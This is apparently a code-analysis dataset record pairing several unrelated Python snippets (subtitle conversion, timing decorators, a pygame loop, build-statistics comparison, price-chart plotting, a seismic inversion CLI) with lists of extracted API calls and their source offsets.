result += child.tail.strip()
if 'color' in style:
result += '</font>'
if style.get('fontstyle') == 'italic':
result += '</i>'
if elem.tag in ('div', 'p', 'br'):
result += '\n'
return result
rendered = []
for timestamp in sorted(timestamps):
rendered.append((timestamp, re.sub(r'\n\n\n+', '\n\n',
render_subtitles(body, timestamp)).strip()))
if not rendered:
exit(0)
# group timestamps together if nothing changes
rendered_grouped = []
last_text = None
for timestamp, content in rendered:
if content != last_text:
rendered_grouped.append((timestamp, content))
last_text = content
# output srt
rendered_grouped.append((rendered_grouped[-1][0] + timedelta(hours=24), ''))
def format_timestamp(timestamp):
return ('%02d:%02d:%02.3f' % (timestamp.total_seconds() // 3600,
timestamp.total_seconds() // 60 % 60,
timestamp.total_seconds() % 60)).replace('.', ',')
if isinstance( outfile, str ) or isinstance( outfile, unicode ):
file = io.open( outfile, 'w', encoding='utf-8' )
else:
file = outfile
srt_i = 1
for i, (timestamp, content) in enumerate(rendered_grouped[:-1]):
if content == '':
continue
file.write( bytearray( '%d\n' % srt_i, 'utf-8' ) )
file.write( bytearray(
format_timestamp( timestamp ) +
' --> ' +
format_timestamp( rendered_grouped[i + 1][0] ) +
'\n'
) )
file.write( bytearray( content + '\n\n', 'utf-8' ) )
srt_i += 1
file.close()
|
[
"datetime.timedelta",
"re.match",
"defusedxml.ElementTree.parse",
"io.open"
] |
[((1334, 1350), 'defusedxml.ElementTree.parse', 'ET.parse', (['infile'], {}), '(infile)\n', (1342, 1350), True, 'from defusedxml import ElementTree as ET\n'), ((2084, 2096), 'datetime.timedelta', 'timedelta', (['(0)'], {}), '(0)\n', (2093, 2096), False, 'from datetime import timedelta\n'), ((2115, 2175), 're.match', 're.match', (['"""^([0-9]+(\\\\.[0-9]+)?)(h|m|s|ms|f|t)$"""', 'expression'], {}), "('^([0-9]+(\\\\.[0-9]+)?)(h|m|s|ms|f|t)$', expression)\n", (2123, 2175), False, 'import re\n'), ((2846, 2919), 're.match', 're.match', (['"""^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$"""', 'expression'], {}), "('^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$', expression)\n", (2854, 2919), False, 'import re\n'), ((3100, 3189), 're.match', 're.match', (['"""^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$"""', 'expression'], {}), "('^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$',\n expression)\n", (3108, 3189), False, 'import re\n'), ((3406, 3418), 'datetime.timedelta', 'timedelta', (['(0)'], {}), '(0)\n', (3415, 3418), False, 'from datetime import timedelta\n'), ((5998, 6037), 'io.open', 'io.open', (['outfile', '"""w"""'], {'encoding': '"""utf-8"""'}), "(outfile, 'w', encoding='utf-8')\n", (6005, 6037), False, 'import io\n'), ((5685, 5704), 'datetime.timedelta', 'timedelta', ([], {'hours': '(24)'}), '(hours=24)\n', (5694, 5704), False, 'from datetime import timedelta\n'), ((2325, 2352), 'datetime.timedelta', 'timedelta', ([], {'hours': 'time_value'}), '(hours=time_value)\n', (2334, 2352), False, 'from datetime import timedelta\n'), ((2404, 2433), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'time_value'}), '(minutes=time_value)\n', (2413, 2433), False, 'from datetime import timedelta\n'), ((2485, 2514), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'time_value'}), '(seconds=time_value)\n', (2494, 2514), False, 'from datetime import timedelta\n'), ((2567, 2601), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': 'time_value'}), '(milliseconds=time_value)\n', (2576, 2601), False, 'from datetime import timedelta\n')]
|
# file: timer_decor.py
import time
class timer:
def __init__(self, func):
self.func = func
self.alltime = 0
def __call__(self, *args, **kwargs):
start = time.time()
result = self.func(*args, **kwargs)
elapsed = time.time() - start
self.alltime += elapsed
# print('%s: %.5f, %.5f' % (self.func.__name__, elapsed, self.alltime))
print('{0}: {1:.5f}, {2:.5f}'.format(self.func.__name__, elapsed, self.alltime))
return result
@timer
def listcomp(N):
return [x * 2 for x in range(N)]
@timer
def mapcall(N):
return map((lambda x: x * 2), range(N))
result = listcomp(5)
listcomp(50000)
listcomp(500000)
listcomp(1000000)
print(result)
print('allTime = {0}'.format(listcomp.alltime))
print('')
result = mapcall(5)
mapcall(50000)
mapcall(500000)
mapcall(1000000)
print(result)
print('allTime = {0}'.format(mapcall.alltime))
print('map/comp = {0}'.format(round(mapcall.alltime / listcomp.alltime, 3)))
|
[
"time.time"
] |
[((187, 198), 'time.time', 'time.time', ([], {}), '()\n', (196, 198), False, 'import time\n'), ((261, 272), 'time.time', 'time.time', ([], {}), '()\n', (270, 272), False, 'import time\n')]
|
import sys
import pygame
from pygame.locals import *
import moyu_engine.config.data.constants as C
import moyu_engine.config.system.assets_system
import moyu_engine.config.system.tilemap_system
import moyu_engine.config.system.move_system
import moyu_engine.config.window.main_window
def init():
pygame.init()
pygame.mixer.init()
SCREEN = pygame.display.set_mode(C.window['size'],pygame.RESIZABLE)
SCREEN_TITLE = pygame.display.set_caption(C.window['title'])
#pygame.display.set_icon(G.tl16)
CLOCK = pygame.time.Clock()
pygame.display.flip()
moyu_engine.config.system.assets_system.AssetsSystem.loader()
moyu_engine.config.system.tilemap_system.TilemapSystem.builder()
while True:
moyu_engine.config.system.move_system.MoveSystem.move()
moyu_engine.config.window.main_window.MainWindow.blit()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
CLOCK.tick(C.window['fps'])
def run():
init()
if __name__ == "__main__":
pass
|
[
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mixer.init",
"pygame.init",
"pygame.display.flip",
"pygame.display.update",
"pygame.display.set_caption",
"pygame.time.Clock",
"sys.exit"
] |
[((308, 321), 'pygame.init', 'pygame.init', ([], {}), '()\n', (319, 321), False, 'import pygame\n'), ((326, 345), 'pygame.mixer.init', 'pygame.mixer.init', ([], {}), '()\n', (343, 345), False, 'import pygame\n'), ((366, 425), 'pygame.display.set_mode', 'pygame.display.set_mode', (["C.window['size']", 'pygame.RESIZABLE'], {}), "(C.window['size'], pygame.RESIZABLE)\n", (389, 425), False, 'import pygame\n'), ((444, 489), 'pygame.display.set_caption', 'pygame.display.set_caption', (["C.window['title']"], {}), "(C.window['title'])\n", (470, 489), False, 'import pygame\n'), ((539, 558), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (556, 558), False, 'import pygame\n'), ((563, 584), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (582, 584), False, 'import pygame\n'), ((894, 912), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (910, 912), False, 'import pygame\n'), ((1015, 1038), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (1036, 1038), False, 'import pygame\n'), ((965, 978), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (976, 978), False, 'import pygame\n'), ((995, 1005), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1003, 1005), False, 'import sys\n')]
|
import inspect
import logging
import time
from functools import wraps
logger = logging.getLogger(__name__)
def benchmark(method):
"""The following decorator aims at calculating the decorated function's
execution time and is used to benchmark our various approaches and assist
us in coming up with a comprehensive comparison of their efficiency.
"""
@wraps(method)
def wrapper(*args, **kwargs):
beg = time.time()
rv = method(*args, **kwargs)
end = time.time()
logger.info("%s returned after %7.3f seconds", method.__name__, end - beg)
return rv
return wrapper
def debug(method):
"""The following decorator serves at emitting details regarding the decorated
function's calls.
In more detai, the information emitted is:
- The function's name.
- Its positional and keyword arguements for the function call at hand.
- Any exception that the function `raises`.
In addition to that, the `debug` decorator passes a special boolean keyword arguement
by the name `debug`, if and only if it is included in the function signature.
You can then utilize this arguement inside the decorated function and emit additional
information.
"""
signature = inspect.signature(method)
defaults = {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
@wraps(method)
def wrapper(*args, **kwargs):
called_with = ""
if args:
called_with += ", ".join(str(x) for x in args)
called_with += ", "
called_with += ", ".join(
f"{x}={kwargs.get(x, defaults[x])}" for x in defaults.keys()
)
try:
rv = method(*args, **kwargs)
except Exception as e:
logger.debug(f"%s(%s) raised %s", method.__name__, called_with, e)
raise
logger.debug(f"%s(%s) returned %s", method.__name__, called_with, rv)
return rv
return wrapper
|
[
"inspect.signature",
"functools.wraps",
"logging.getLogger",
"time.time"
] |
[((80, 107), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (97, 107), False, 'import logging\n'), ((374, 387), 'functools.wraps', 'wraps', (['method'], {}), '(method)\n', (379, 387), False, 'from functools import wraps\n'), ((1273, 1298), 'inspect.signature', 'inspect.signature', (['method'], {}), '(method)\n', (1290, 1298), False, 'import inspect\n'), ((1451, 1464), 'functools.wraps', 'wraps', (['method'], {}), '(method)\n', (1456, 1464), False, 'from functools import wraps\n'), ((436, 447), 'time.time', 'time.time', ([], {}), '()\n', (445, 447), False, 'import time\n'), ((499, 510), 'time.time', 'time.time', ([], {}), '()\n', (508, 510), False, 'import time\n')]
|
#! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# SPDX-License-Identifier: Apache-2.0
import os
import sys
import glob
import re
from scipy import stats
import numpy
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(THIS_DIR, 'poky', 'scripts', 'lib'))
from buildstats import BuildStats, diff_buildstats, taskdiff_fields, BSVerDiff
ICECREAM_TASKS = ('do_compile', 'do_compile_kernelmodules', 'do_configure', 'do_install')
VALUES = ('cputime', 'walltime')
def sum_task_totals(bs):
d = {}
for recipe_data in bs.values():
for name, bs_task in recipe_data.tasks.items():
for val_type in VALUES:
val = getattr(bs_task, val_type)
key = (name, val_type)
if name not in ICECREAM_TASKS:
key = ('other', val_type)
d.setdefault(key, 0)
d[key] += val
key = ('overall', val_type)
d.setdefault(key, 0)
d[key] += val
return d
def get_elapsed(p):
elapsed = None
cpu = None
with open(os.path.join(p, 'build_stats'), 'r') as f:
for l in f:
m = re.match(r'Elapsed time: (?P<elapsed>[\d.]+) ', l)
if m is not None:
elapsed = float(m.group('elapsed'))
continue
m = re.match(r'CPU usage: (?P<cpu>[\d.]+)%', l)
if m is not None:
cpu = float(m.group('cpu')) / 100
if elapsed is None:
raise Exception('Elapsed time not found for %s' % p)
if cpu is None:
raise Exception('CPU usage not found for %s' % p)
return (elapsed, cpu)
def pooled_stdev(a_std_dev, b_std_dev):
return numpy.sqrt((a_std_dev**2 + b_std_dev**2)/2)
def write_elapsed():
with open(os.path.join(THIS_DIR, 'stats', 'elapsed.csv'), 'w') as f:
f.write('Build,Elapsed without Icecream,Elapsed with Icecream,CPU usage without Icecream,CPU usage with Icecream\n')
elapsed_combined_without = []
elapsed_combined_with = []
cpu_combined_without = []
cpu_combined_with = []
for p in glob.glob(os.path.join(THIS_DIR, 'stats', 'build*')):
without_elapsed, without_cpu = get_elapsed(os.path.join(p, 'without-icecream'))
with_elapsed, with_cpu = get_elapsed(os.path.join(p, 'with-icecream'))
elapsed_combined_without.append(without_elapsed)
elapsed_combined_with.append(with_elapsed)
cpu_combined_without.append(without_cpu)
cpu_combined_with.append(with_cpu)
f.write('%s,%f,%f,%f,%f\n' % (os.path.basename(p), without_elapsed, with_elapsed,
without_cpu, with_cpu))
f.write('\n')
f.write(',Average without Icecream (s),Without Icecream std dev,Average with Icecream (s),With Icecream std dev,p-value,Percent Change,Percent Change std dev\n')
average_without = numpy.average(elapsed_combined_without)
average_with = numpy.average(elapsed_combined_with)
without_std_dev = numpy.std(elapsed_combined_without)
with_std_dev = numpy.std(elapsed_combined_with)
change = (average_with - average_without) / average_without
pooled_std_dev = pooled_stdev(without_std_dev, with_std_dev) / average_without
_, p = stats.ttest_rel(elapsed_combined_without, elapsed_combined_with)
f.write('Elapsed Time,%f,%f,%f,%f,%e,%.2f,%f\n' % (
average_without, without_std_dev,
average_with, with_std_dev, p,
change, pooled_std_dev))
f.write('\n')
f.write(',Average without Icecream,Without Icecream std dev,Average with Icecream,With Icecream std dev,p-value,Delta\n')
average_without = numpy.average(cpu_combined_without)
average_with = numpy.average(cpu_combined_with)
without_std_dev = numpy.std(cpu_combined_without)
with_std_dev = numpy.std(cpu_combined_with)
delta = average_with - average_without
_, p = stats.ttest_rel(cpu_combined_without, cpu_combined_with)
f.write('CPU Usage,%f,%f,%f,%f,%e,%.2f\n' % (
average_without, without_std_dev,
average_with, with_std_dev, p,
delta))
def write_tasks():
with open(os.path.join(THIS_DIR, 'stats', 'raw.csv'), 'w') as f:
combined_with = {}
combined_without = {}
f.write('Task,Attribute,Build,Without Icecream,With Icecream\n')
for p in glob.glob(os.path.join(THIS_DIR, 'stats', 'build*')):
without_stats = BuildStats.from_dir(os.path.join(p, 'without-icecream'))
with_stats = BuildStats.from_dir(os.path.join(p, 'with-icecream'))
without_d = sum_task_totals(without_stats)
with_d = sum_task_totals(with_stats)
for k in without_d.keys():
without_val = without_d[k]
with_val = with_d[k]
f.write("%s,%s,%s,%f,%f\n" % (k[0], k[1], os.path.basename(p), without_val, with_val))
combined_with.setdefault(k, []).append(with_val)
combined_without.setdefault(k, []).append(without_val)
with open(os.path.join(THIS_DIR, 'stats', 'totals.csv'), 'w') as f:
f.write('Task,Attribute,Without Icecream,Without Std dev,With Icecream,With Std dev,p-value,Percent Change,Percent Change Std Dev\n')
for k in combined_without.keys():
without_avg = numpy.average(combined_without[k])
with_avg = numpy.average(combined_with[k])
without_std_dev = numpy.std(combined_without[k])
with_std_dev = numpy.std(combined_with[k])
change = (with_avg - without_avg) / without_avg
pooled_std_dev = pooled_stdev(without_std_dev, with_std_dev) / without_avg
_, p = stats.ttest_rel(combined_without[k], combined_with[k])
f.write("%s,%s,%f,%f,%f,%f,%e,%.2f,%f\n" % (k[0], k[1], without_avg, without_std_dev, with_avg, with_std_dev, p, change, pooled_std_dev))
def main():
write_tasks()
write_elapsed()
if __name__ == "__main__":
main()
# exit on any error and unset variables
#set -u -e -o pipefail
#THIS_DIR="$(readlink -f $(dirname $0))"
#
#TASKS="do_configure do_compile do_install do_package_write_rpm"
#ATTRS="cputime walltime"
#
#echo "Task,Attribute,Build,Without Icecream,With Icecream" > $THIS_DIR/stats/stat.csv
#
#for d in $THIS_DIR/stats/build*; do
# for task in $TASKS; do
# for attr in $ATTRS; do
# VAL="$($THIS_DIR/poky/scripts/buildstats-diff --only-task $task --diff-attr $attr $d/without-icecream $d/with-icecream | tail -1)"
# echo "$task,$attr,$d,$(echo $VAL | sed 's/.*(\([0-9.]\+\)s).*(\([0-9.]\+\)s).*/\1,\2/g')" >> $THIS_DIR/stats/stat.csv
# done
# done
#done
|
[
"numpy.average",
"os.path.basename",
"numpy.std",
"scipy.stats.ttest_rel",
"os.path.realpath",
"re.match",
"os.path.join",
"numpy.sqrt"
] |
[((224, 250), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (240, 250), False, 'import os\n'), ((268, 316), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""poky"""', '"""scripts"""', '"""lib"""'], {}), "(THIS_DIR, 'poky', 'scripts', 'lib')\n", (280, 316), False, 'import os\n'), ((1754, 1803), 'numpy.sqrt', 'numpy.sqrt', (['((a_std_dev ** 2 + b_std_dev ** 2) / 2)'], {}), '((a_std_dev ** 2 + b_std_dev ** 2) / 2)\n', (1764, 1803), False, 'import numpy\n'), ((3007, 3046), 'numpy.average', 'numpy.average', (['elapsed_combined_without'], {}), '(elapsed_combined_without)\n', (3020, 3046), False, 'import numpy\n'), ((3070, 3106), 'numpy.average', 'numpy.average', (['elapsed_combined_with'], {}), '(elapsed_combined_with)\n', (3083, 3106), False, 'import numpy\n'), ((3133, 3168), 'numpy.std', 'numpy.std', (['elapsed_combined_without'], {}), '(elapsed_combined_without)\n', (3142, 3168), False, 'import numpy\n'), ((3192, 3224), 'numpy.std', 'numpy.std', (['elapsed_combined_with'], {}), '(elapsed_combined_with)\n', (3201, 3224), False, 'import numpy\n'), ((3395, 3459), 'scipy.stats.ttest_rel', 'stats.ttest_rel', (['elapsed_combined_without', 'elapsed_combined_with'], {}), '(elapsed_combined_without, elapsed_combined_with)\n', (3410, 3459), False, 'from scipy import stats\n'), ((3825, 3860), 'numpy.average', 'numpy.average', (['cpu_combined_without'], {}), '(cpu_combined_without)\n', (3838, 3860), False, 'import numpy\n'), ((3884, 3916), 'numpy.average', 'numpy.average', (['cpu_combined_with'], {}), '(cpu_combined_with)\n', (3897, 3916), False, 'import numpy\n'), ((3943, 3974), 'numpy.std', 'numpy.std', (['cpu_combined_without'], {}), '(cpu_combined_without)\n', (3952, 3974), False, 'import numpy\n'), ((3998, 4026), 'numpy.std', 'numpy.std', (['cpu_combined_with'], {}), '(cpu_combined_with)\n', (4007, 4026), False, 'import numpy\n'), ((4089, 4145), 'scipy.stats.ttest_rel', 'stats.ttest_rel', (['cpu_combined_without', 'cpu_combined_with'], {}), '(cpu_combined_without, cpu_combined_with)\n', (4104, 4145), False, 'from scipy import stats\n'), ((1132, 1162), 'os.path.join', 'os.path.join', (['p', '"""build_stats"""'], {}), "(p, 'build_stats')\n", (1144, 1162), False, 'import os\n'), ((1211, 1261), 're.match', 're.match', (['"""Elapsed time: (?P<elapsed>[\\\\d.]+) """', 'l'], {}), "('Elapsed time: (?P<elapsed>[\\\\d.]+) ', l)\n", (1219, 1261), False, 'import re\n'), ((1386, 1429), 're.match', 're.match', (['"""CPU usage: (?P<cpu>[\\\\d.]+)%"""', 'l'], {}), "('CPU usage: (?P<cpu>[\\\\d.]+)%', l)\n", (1394, 1429), False, 'import re\n'), ((1834, 1880), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""elapsed.csv"""'], {}), "(THIS_DIR, 'stats', 'elapsed.csv')\n", (1846, 1880), False, 'import os\n'), ((2184, 2225), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""build*"""'], {}), "(THIS_DIR, 'stats', 'build*')\n", (2196, 2225), False, 'import os\n'), ((4343, 4385), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""raw.csv"""'], {}), "(THIS_DIR, 'stats', 'raw.csv')\n", (4355, 4385), False, 'import os\n'), ((4555, 4596), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""build*"""'], {}), "(THIS_DIR, 'stats', 'build*')\n", (4567, 4596), False, 'import os\n'), ((5243, 5288), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""totals.csv"""'], {}), "(THIS_DIR, 'stats', 'totals.csv')\n", (5255, 5288), False, 'import os\n'), ((5511, 5545), 'numpy.average', 'numpy.average', (['combined_without[k]'], {}), '(combined_without[k])\n', (5524, 5545), False, 'import numpy\n'), ((5569, 5600), 'numpy.average', 'numpy.average', (['combined_with[k]'], {}), '(combined_with[k])\n', (5582, 5600), False, 'import numpy\n'), ((5631, 5661), 'numpy.std', 'numpy.std', (['combined_without[k]'], {}), '(combined_without[k])\n', (5640, 5661), False, 'import numpy\n'), ((5689, 5716), 'numpy.std', 'numpy.std', (['combined_with[k]'], {}), '(combined_with[k])\n', (5698, 5716), False, 'import numpy\n'), ((5883, 5937), 'scipy.stats.ttest_rel', 'stats.ttest_rel', (['combined_without[k]', 'combined_with[k]'], {}), '(combined_without[k], combined_with[k])\n', (5898, 5937), False, 'from scipy import stats\n'), ((2283, 2318), 'os.path.join', 'os.path.join', (['p', '"""without-icecream"""'], {}), "(p, 'without-icecream')\n", (2295, 2318), False, 'import os\n'), ((2369, 2401), 'os.path.join', 'os.path.join', (['p', '"""with-icecream"""'], {}), "(p, 'with-icecream')\n", (2381, 2401), False, 'import os\n'), ((4647, 4682), 'os.path.join', 'os.path.join', (['p', '"""without-icecream"""'], {}), "(p, 'without-icecream')\n", (4659, 4682), False, 'import os\n'), ((4729, 4761), 'os.path.join', 'os.path.join', (['p', '"""with-icecream"""'], {}), "(p, 'with-icecream')\n", (4741, 4761), False, 'import os\n'), ((2664, 2683), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (2680, 2683), False, 'import os\n'), ((5046, 5065), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (5062, 5065), False, 'import os\n')]
|
# use python3
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
from matplotlib import patches
from matplotlib.pyplot import figure
from datetime import timedelta, date
def date_range(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
def time2int(time_str: str) -> int:
"""Transform '01:57:00' to (int)157"""
return int(time_str[:2] + time_str[3:5])
def time2str(time_int: int) -> str:
"""Transform 157 to '01:57:00'"""
padded_str = str(time_int).zfill(4) # 157 becomes "0157"
return padded_str[:2] + ":" + padded_str[2:4] + ":00"
def narrow_adjust(closing_prices, leftmost_min_index, leftmost_max_index, curr_min, curr_max, window_lborder,
window_rborder):
best_min_index = leftmost_min_index
best_max_index = leftmost_max_index
if leftmost_min_index < leftmost_max_index:
while (closing_prices[best_min_index + 1] == curr_min):
best_min_index += 1
while (closing_prices[best_max_index - 1] == curr_max):
best_max_index -= 1
else:
while (closing_prices[best_min_index - 1] == curr_min):
best_min_index -= 1
while (closing_prices[best_max_index + 1] == curr_max):
best_max_index += 1
return best_min_index, best_max_index
def plot_graph(single_date,
closing_prices,
min_max_pairs,
min_close_price,
max_close_price,
hyperparams,
dark_mode=False):
if dark_mode:
plt.style.use('dark_background')
figure(figsize=(48, 10), dpi=100)
ax = plt.subplot(1, 1, 1)
for pair in min_max_pairs:
# print(pair)
# Green when price surges, red when price drops
if dark_mode:
curr_color = (.2, .45, .2) if pair[0] < pair[1] else (.4, .2, .2)
else:
curr_color = (.7, 1, .7) if pair[0] < pair[1] else (1, .7, .7)
ax.add_patch(
patches.Rectangle((min(pair[0], pair[1]), min_close_price),
abs(pair[0] - pair[1]),
max_close_price - min_close_price + 3,
color=curr_color))
if dark_mode:
plt.plot(closing_prices, color="#99ccff")
else:
plt.plot(closing_prices)
plt.legend(['Closing price'], fontsize=20)
plt.title(f'New Algorithm ({single_date.strftime("%Y-%m-%d")})\n' +
f'No. of green/red stripes: {len(min_max_pairs)}, ' + f'Window size: {hyperparams[0]}, ' +
f'Slope threshold: {hyperparams[1]}, ' + f'Jump size threshold: {hyperparams[2]}',
fontsize=30)
plt.xlabel('Minutes since 00:00:00', fontsize=25)
plt.xticks(fontsize=18)
plt.ylabel('Closing price', fontsize=25)
plt.yticks(fontsize=18)
plt.savefig("figures_new_algo/" + single_date.strftime("%Y-%m-%d") +
f'_{hyperparams[0]}__{hyperparams[1]}__{hyperparams[2]}_' + ('_(dark)' if dark_mode else '_(light)') +
'.png')
plt.clf()
def main(window_size, slope_threshold, jump_size_threshold):
# window_size = 5 # hyperparameter window size
# slope_threshold = 0.1 # hyperparameter slope threshold
# jump_size_threshold = 1.0 # hyperparameter jump size threshold
hyperparams = (window_size, slope_threshold, jump_size_threshold)
start_date = date(2010, 3, 24)
end_date = date(2010, 3, 27)
for single_date in date_range(start_date, end_date):
df = pd.read_csv(single_date.strftime("%Y-%m-%d") + '.csv')
df.sort_values(by='dt') # don't need?
times = df['tm'].values.tolist() # the time (hr:min:sec) column
closing_prices = df['close'].values.tolist() # the closing price column
max_close_price = max(closing_prices)
min_close_price = min(closing_prices)
start_time: int = time2int(times[0])
end_time: int = time2int(times[-1])
window_lborder: int = start_time
window_rborder: int = start_time + window_size # upperbound to be excluded
min_max_pairs = [] # list of start-end index pairs whose area between should be colored red/green
while window_lborder < end_time:
window_rborder = min(window_rborder, end_time)
curr_slice = closing_prices[window_lborder:window_rborder]
if len(curr_slice) == 0:
break
curr_min: float = min(curr_slice)
curr_max: float = max(curr_slice)
if curr_min == curr_max:
window_lborder = window_rborder
window_rborder += window_size
continue
leftmost_min_index: int = closing_prices.index(curr_min, window_lborder, window_rborder)
leftmost_max_index: int = closing_prices.index(curr_max, window_lborder, window_rborder)
best_min_index, best_max_index = narrow_adjust(closing_prices, leftmost_min_index, leftmost_max_index,
curr_min, curr_max, window_lborder, window_rborder)
if ((curr_max - curr_min) / abs(best_min_index - best_max_index) > slope_threshold) and (
(curr_max - curr_min) >= jump_size_threshold):
min_max_pairs.append([best_min_index, best_max_index])
window_lborder = max(best_min_index, best_max_index)
window_rborder = window_lborder + window_size
else:
window_lborder = window_rborder
window_rborder += window_size
plot_graph(single_date,
closing_prices,
min_max_pairs,
min_close_price,
max_close_price,
hyperparams,
dark_mode=True)
if __name__ == '__main__':
count = 0
for i in range(1, 16): # slope
for j in range(8, 26): # jump size
main(5, i / 10, j / 10)
count += 1
print(f">>>>>>{count*100/(15*18):.2f}% Done...\n")
|
[
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.yticks",
"datetime.date",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.rcParams.update",
"matplotlib.pyplot.style.use",
"matplotlib.pyplot.xticks",
"datetime.timedelta",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((68, 119), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'figure.max_open_warning': 0}"], {}), "({'figure.max_open_warning': 0})\n", (87, 119), True, 'import matplotlib.pyplot as plt\n'), ((1673, 1706), 'matplotlib.pyplot.figure', 'figure', ([], {'figsize': '(48, 10)', 'dpi': '(100)'}), '(figsize=(48, 10), dpi=100)\n', (1679, 1706), False, 'from matplotlib.pyplot import figure\n'), ((1717, 1737), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (1728, 1737), True, 'import matplotlib.pyplot as plt\n'), ((2418, 2460), 'matplotlib.pyplot.legend', 'plt.legend', (["['Closing price']"], {'fontsize': '(20)'}), "(['Closing price'], fontsize=20)\n", (2428, 2460), True, 'import matplotlib.pyplot as plt\n'), ((2766, 2815), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Minutes since 00:00:00"""'], {'fontsize': '(25)'}), "('Minutes since 00:00:00', fontsize=25)\n", (2776, 2815), True, 'import matplotlib.pyplot as plt\n'), ((2820, 2843), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'fontsize': '(18)'}), '(fontsize=18)\n', (2830, 2843), True, 'import matplotlib.pyplot as plt\n'), ((2848, 2888), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Closing price"""'], {'fontsize': '(25)'}), "('Closing price', fontsize=25)\n", (2858, 2888), True, 'import matplotlib.pyplot as plt\n'), ((2893, 2916), 'matplotlib.pyplot.yticks', 'plt.yticks', ([], {'fontsize': '(18)'}), '(fontsize=18)\n', (2903, 2916), True, 'import matplotlib.pyplot as plt\n'), ((3137, 3146), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (3144, 3146), True, 'import matplotlib.pyplot as plt\n'), ((3482, 3499), 'datetime.date', 'date', (['(2010)', '(3)', '(24)'], {}), '(2010, 3, 24)\n', (3486, 3499), False, 'from datetime import timedelta, date\n'), ((3515, 3532), 'datetime.date', 'date', (['(2010)', '(3)', '(27)'], {}), '(2010, 3, 27)\n', (3519, 3532), False, 'from datetime import timedelta, date\n'), ((1636, 1668), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""dark_background"""'], {}), "('dark_background')\n", (1649, 1668), True, 'import matplotlib.pyplot as plt\n'), ((2329, 2370), 'matplotlib.pyplot.plot', 'plt.plot', (['closing_prices'], {'color': '"""#99ccff"""'}), "(closing_prices, color='#99ccff')\n", (2337, 2370), True, 'import matplotlib.pyplot as plt\n'), ((2389, 2413), 'matplotlib.pyplot.plot', 'plt.plot', (['closing_prices'], {}), '(closing_prices)\n', (2397, 2413), True, 'import matplotlib.pyplot as plt\n'), ((348, 360), 'datetime.timedelta', 'timedelta', (['n'], {}), '(n)\n', (357, 360), False, 'from datetime import timedelta, date\n')]
|
"""
xsede_perform_psf_test.py: get the preconditioned summed kernel for doing the PSF test.
It's just the copy of xsede_perform_structure_inversion.py, but not submit the job3, and part of the job2 is contained into job1.
useless flags may be possible to exist.
"""
import sys
from os.path import join
import click
import sh
from ...slurm.submit_job import submit_job
from ...tasks.xsede.forward import forward_task
from ..shared.build_structure import Build_structure
from .xsede_perform_source_inversion import (calculate_misfit_windows,
calculate_stations_adjoint,
change_simulation_type,
collect_sync_files,
cp_stations_adjoint2structure,
ln_adjoint_source_to_structure)
from .xsede_process_kernel import \
construct_structure as construct_process_kernel_structure
from .xsede_process_kernel import do_preconditioned_summation
@click.command()
@click.option('--base_directory', required=True, type=str, help="the base inversion directory")
@click.option('--cmts_directory', required=True, type=str, help="the cmts directory")
@click.option('--ref_directory', required=True, type=str, help="the reference specfem directory")
@click.option('--windows_directory', required=True, type=str, help="the windows directory")
@click.option('--data_asdf_directory', required=True, type=str, help="the processed data directory")
@click.option('--data_info_directory', required=True, type=str, help="the data info directory")
@click.option('--last_step_model_update_directory', required=True, type=str, help="the last step smoothed kernel directory")
@click.option('--stations_path', required=True, type=str, help="the stations path")
@click.option('--sem_utils_directory', required=True, type=str, help="the sem_utils directory")
@click.option('--source_mask_directory', required=False, default="", type=str, help="the source mask directory")
@click.option('--n_total', required=True, type=int, help="the total number of events")
@click.option('--n_each', required=True, type=int, help="number of events to run in each iteration")
@click.option('--n_iter', required=True, type=int, help="the number of iterations to run")
@click.option('--nproc', required=True, type=int, help="the number of processes used for each event")
@click.option('--n_node', required=True, type=int, help="the number of nodes used in simulation")
